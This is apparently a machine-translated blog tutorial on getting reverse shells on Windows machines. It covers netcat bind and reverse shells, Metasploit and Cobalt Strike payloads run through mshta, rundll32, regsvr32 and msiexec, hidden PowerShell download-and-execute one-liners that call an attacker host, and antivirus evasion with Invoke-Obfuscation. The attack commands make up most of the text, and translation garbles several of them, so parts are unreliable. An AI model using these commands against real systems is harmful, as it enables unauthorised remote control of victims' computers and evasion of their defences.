The article directories
- Rebound Shell introduction
- Common rebound mode
-
- NetCat (NC) rebounded
-
- Forward NC
- Reverse NC
- Use mshta. Exe
-
- MSF uses modules
-
- Methods a (msfconsole)
- Method 2 (msfvenom)
- Cobaltstrike exploits modules
- Hta attack source code
- Rundll32. Exe
-
- MSF uses modules
-
- Methods a (msfconsole)
- Method 2 (msfvenom)
- Rundll32 loading the hta
- Regsvr32. Exe
-
- MSF uses modules
- Use msiexec. Exe
-
- MSF uses modules
- Powershell script
-
- PowerShell loads remote scripts
- Powershell version NC
- Bounce the shell through Web delivery
-
- Msfconsole generated
- CS is generated
- Use powershell to execute the. VBS file
- Execute. Bat files using Powershell
- Bypass antivirus software
-
- processes
Rebound Shell introduction
The rebound shell basically allows us to remotely connect to the target console and give instructions to control the target asset! Rebound shell is divided into:
- Forward rebound: The way in which the control (our own machine) sends a request to connect to the controlled (the target machine).
However, this approach will be affected by many factors, such as firewall, routing, etc., and it is difficult to succeed.
- Reverse rebound: the controlled end actively sends a request to connect to our control end.
This method is to find a way to avoid firewall and routing restrictions!
Common rebound mode
NetCat (NC) rebounded
Under normal circumstances, there is no NC in Windows system. If we want to use NC, we need to upload this program to the target machine first. Please find resources on the Internet.
After downloading a good NC, you cancd
Use it in the download directory, or add the NC directory to the environment variable!
Forward NC
The forward bounce is to get the target machine ready and waiting for the attack aircraft to connect. So we need to execute commands on the controlled side now, and then connect on the control side!
# is accused of end
Use the more verbose (-vv) listening mode (-l) to listen for inbound information on the specified port number (p) and import the specified program (-e).
nc -lvvpThe port number-eUse the programIf the controller redirects the local Powershell program to port 6543, the controller only needs to actively connect to port 6543 to get the use of this program!
nc -lvvp 6543 -e powershell.exe
# control (currently my controlled address is :192.168.1.251)Nc Target IP address Port NC192.168.1.251 6543
Copy the code
The above Powershell can be replaced with CMD!
Reverse NC
Contrary to the positive direction, we now need to turn on the monitor in the control machine and wait for the controlled machine to actively connect to us!
The control side #
nc -lvvpport# if
nc -lvvp 4567
Controlled end (current IP address: 192.168.1.169)
nc -eUse the program target address port# if
nc -e cmd.exe 192.168.1.169 4567
Copy the code
Use mshta. Exe
Mshta.exe is a Windows system application responsible for interpreting running HTA(HTML application) files. You can run HTML files in JavaScript or VBScript. This is a Windows system in its own application! We can use the implementation of our. Hta Trojan to carry out shell rebound!
MSF uses modules
Methods a (msfconsole)
Exploit/Windows/misC/hTA_server
Enter the MSF module
use exploit/windows/misc/hta_server
We need to set srvhost and srvport, because this attack payload will open a Web service for the target to access! Srvhost and srvport are used to specify which IP address and port the service is enabled on. By default, 0.0.0.0 is enabled on all local IP addresses.
setSrvhost local IP# attack with the load, I am a Windows/x64 meterpreter/reverse_tcp
setPayload Attack payloadset payload windows/x64/meterpreter/reverse_tcp
The default is x86, here we choose X64
set target 1
Bind attack plane IP
setLhost 192.168.1.200# startup script
run
Copy the code
After the startup generates a target address, just let the target executeMshta Destination address
(Mshta http://192.168.1.200:8080/PgE4ymVU3VQ.hta
) to online target machine!
Method 2 (msfvenom)
The MSFvenom module also supports.hTA file generation
# /bin/bash to generate Trojan filesMsfvenom -p Windows/x64 meterpreter/reverse_tcp lhost = 192.168.1.200 lport = 4456 - f the hta - PSH - o (1) the hta# open a simple server for target machine to download Trojan (current download address to http://192.168.1.200:6123/1.hta)
python3 -m http.server 6123
# msfConsole performs listeningHandler - p Windows/x64 / meterpreter / 192.168.1.200 reverse_tcp - H - p 4456Copy the code
The target machine is also executingMshta http://192.168.1.200:6123/1.hta
Can go online!
Cobaltstrike exploits modules
In addition to MSF, CS can also generate HTS files and use them!
First we select the generate backdoor optionHTML Application
And generate it.hta
file
Then use the file download in the phishing tool to open a download service for the target to download
Then only target execution is requiredMshta http://43.128.11.131:8081/download/file.ext
You can go online.
Note: The Trojan generated here is 32 bit, may run on 64 bit host problems! For 64-bit hosts, it’s best to run a Trojan generated in MSF!
Hta attack source code
According to the hTA Trojan generated by MSF above, we can see that this attack finally calls Powershell to perform some shell rebound operations! However, there are some obfuscation operations to reduce the possibility of soft discovery!
Rundll32. Exe
Those of you who have used Python know that Python is powerful because there are many libraries that support it. For example, if you want to generate a random number, you just call the Random library. The Dynamic Link Library (DLL) is a Library in Windows. It contains some common methods and allows different programs to call its code and data. In this case, rundll32.exe is a Windows program designed to call functions (16 or 32 bits) in these libraries (DLLS) and store them in the appropriate memory library.
MSF uses modules
Methods a (msfconsole)
Use modules: Exploit/Windows/SMB /smb_delivery Note here that we need to run MSF as root because port 445 will be called later and only root has permission to use this port.
# Use this module
use exploit/windows/smb/smb_delivery
Port 445 is used by default when downloading DLL files on the target machine.
Bind attack plane IP
setLhost 192.168.1.200Because port 4444 has been occupied, I change another port
set lport 4454
The rundll32.exe command is generated on the target machine
# rundll32. Exe \ \ 192.168.1.200 \ kbFWW \ test DLL, 0
Copy the code
Method 2 (msfvenom)
# Attack aircraft generate file
msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.200 lport=5333 -f dll -o test.dll
# Open web service, provide Trojan download
python3 -m http.server
# enable monitor
handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.1.200 -P 5333
# Target download file (Certutil is a Windows native certificate service, which I covered in this Windows blog in common file transfer methods for penetration testing)
certutil.exe -urlcache -split -f http://192.168.1.200:7789/test.dll
# Execute DLL better write absolute path!!Rundll32 shell32.dll,Control_RunDLL C:\ Penetration test tool \test.dllCopy the code
Rundll32 loading the hta
Rundll32 can load not only DLLS but also Htas
# here I will call the same port 5333 as above, no need to generate listener
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.200 lport=5333 -f hta-psh > 1.hta
# Same as above, transfer our Trojan to the target machine
certutil.exe -urlcache -split -f http://192.168.1.200:7785/1.hta
Call url.dll to execute
rundll32.exe url.dll,OpenURL C:\Users\xunmi\1.hta
Copy the code
Regsvr32. Exe
Regsvr32 is also a DLL related program, which replicates the registration and logout of OLE controls. OLE(Object linking and Embedding) controls refer to the DLL and ActiveX controls in the Windows registry. This tool will be in the % Systemroot %\System32(C:\Windows\System32) folder by default
Regsvr32 Common attributes | role |
---|---|
/u | Log out of the server |
/i | Call DllInstall to pass an optional [cmdline]; When it is used with /u, it calls a DLL to unload |
/n | Do not call DllRegisterServer; This option must be used with/I |
/s | Silent; The message box is not displayed |
MSF uses modules
Exploit /multi/script/web_delivery
Set the generated attack file to Regsvr32 format
set target 3
Select the attack payload
set payload windows/x64/meterpreter/reverse_tcp
Bind attack plane IP
set lhost 192.168.1.200
Set lport and srvport based on the port usage of your machine.
Copy the code
Use msiexec. Exe
Msi (MSI: Microsoft Installer) is used to explain the installation of msiexec. As I wrote in My Windows Always Install Elevated blog, we could take advantage of a bug in the.MSI installer to execute commands if the administrator was misconfigured. Those of you who are interested can check it out.
MSF uses modules
Here, the MSFvenom module is used to generate an MSI command package
# The same is a target
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.200 lport=4578 -f msi > 1.msi
# Mount it for download
python3 -m http.server 6542
# set listener
handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.1.200 -P 4578
# download execution (/q is silent execution/I does not output any log files)
msiexec /q /i http://192.168.1.200:6542/1.msi
Copy the code
Powershell script
Many of the above rebound shell commands will eventually call Powershell for rebound. As can be seen from the source code of the above mshta.exe attack, most of the various rebound shell scripts we generate are powershell scripts with various skins in essence.
PowerShell loads remote scripts
Generate powerShell bounce scripts
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.200 lport=4578 -f psh-reflection -o shell.ps1
# Mount it for download
python3 -m http.server 6542
# Execute rebound shell command (use hidden unrestricted bypass and load in memory (IEX remote script)
powershell -windowstyle hidden -exec bypass -c "The IEX (New - Object Net. WebClient). DownloadString (' http://192.168.1.200:6542/shell.ps1 ')";
Copy the code
After executing the bounce-back shell script in CMD on the target machine, a Powershell child is launched in CMD to execute our bounce-back commands frequently!
Powershell version NC
Open source download: github.com/besimorhino… First we need to upload this script to the target!
# Now start NC listening on our attack aircraft
nc -lvvp 12345
Then load the remote script and connect it to our attack plane
powershell -c "The IEX (New - Object System.Net.WebClient). DownloadString (' http://43.128.11.131:8000/powercat.ps1 '); Powercat -c 192.168.1.200 -p 12345 -e CMD"
Copy the code
Bounce the shell through Web delivery
Msfconsole generated
Use modules: use exploit/multi/script/web_delivery
use exploit/multi/script/web_delivery
# General configuration
set payload windows/x64/meterpreter/reverse_tcp
set target 2
set lhost 192.168.1.200
set lport 8525
run
Copy the code
CS is generated
The specific usage is as shown in the figure below. You only need to find a way to make the generated command execute by the target machine!
Use powershell to execute the. VBS file
To start. VBS we need to use script.exe, which can execute WSF, JS and VBscript scripts.
Start by generating a.vbs script
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.200 LPORT=7777 -f vbs -o 1.vbs
# Mount it for download
python3 -m http.server 6542
# start listening
handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.1.200 -P 7777
Execute the rebound shell command
powershell -c "(New - the Object System.NET.WebClient). DownloadFile (' http://192.168.1.200:6542/1.vbs', '$env:temp\test.vbs'); Start-Process cscript.exe '$env:temp\test.vbs'"
Copy the code
Execute. Bat files using Powershell
Bat is a batch file under Windows,Windows default can be directly called execution, in theory is quite convenient, but I did not successfully reproduce this method.
First generate a.bat script
msfvenom -p cmd/windows/powershell_reverse_tcp LHOST=192.168.1.200 LPORT=7788 -o 1.bat
# Mount it for download
python3 -m http.server 6542
# start listening
handler -p cmd/windows/powershell_reverse_tcp -H 192.168.1.200 -P 7788
Execute the rebound shell command
powershell -windowstyle hidden -exec bypass -c "The IEX (New - Object Net. WebClient). DownloadString (' http://192.168.1.200:6542/1.bat '); 1.bat";
powershell -c "The IEX (New - Object System.Net.WebClient). DownloadString (' http://192.168.1.200:6542/1.bat ')"
Copy the code
Bypass antivirus software
processes
Here I will mainly use a Powershell module called invoke-obfuscation for Obfuscation processing.
Set the powershell mode so that our script can run freely
powershell.exe -ep bypass
# load script
Import-Module. /Invoke-Obfuscation.psd1
# startup script
Invoke-Obfuscation
Copy the code
Sets the location of the source code to obfuscate
setScriptpath I: penetration test temporary file source rebound shell code. Ps1Copy the code
Set obfuscation mode
token\all
1
# or (same effect)
token\all\1
Copy the code
Output obfuscation file
Out I:\ penetration test \ temporary file \ obfuscated code. Ps1Copy the code
Contrast can be seen, this principle of confusion will be our original code keywords disorderly discharge, so that anti-virus software can not find our Trojan features! In addition toInvoke-Obfuscation
There are many other crypto-obfuscation features!